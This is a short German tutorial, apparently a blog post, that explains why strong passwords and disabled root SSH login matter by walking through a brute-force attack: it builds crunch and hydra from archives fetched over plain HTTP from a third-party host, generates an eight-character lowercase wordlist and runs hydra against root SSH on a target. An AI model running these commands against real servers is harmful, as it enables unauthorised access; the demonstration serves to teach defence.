Überall heißt es immer, man soll komplexe Passwörter verwenden, den SSH port ändern, Root Login deaktivieren usw. Aber warum eigentlich? In dieser Anleitung möchte ich zeigen, warum genau dies wichtig ist.
1. Benötigte Software installieren
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
apt-get update apt-get upgrade apt-get install build-essential wget libssh-dev cd /usr/src wget http://dl.bitforce.io:11520/crunch-3.6.tgz wget http://dl.bitforce.io:11520/hydra-8.1.tar.gz tar xfvz crunch-3.6.tgz tar xfvz hydra-8.1.tar.gz cd crunch-3.6 make make install cd ../hydra-8.1 ./configure make make install |
2. Wordlist generieren
|
1 |
crunch 1 8 abcdefghijklmnopqrstuvwxyz -o password.txt |
3. Hydra starten
|
1 |
hydra -l root -P password.txt ssh://[IP oder Domain des Zielservers] |

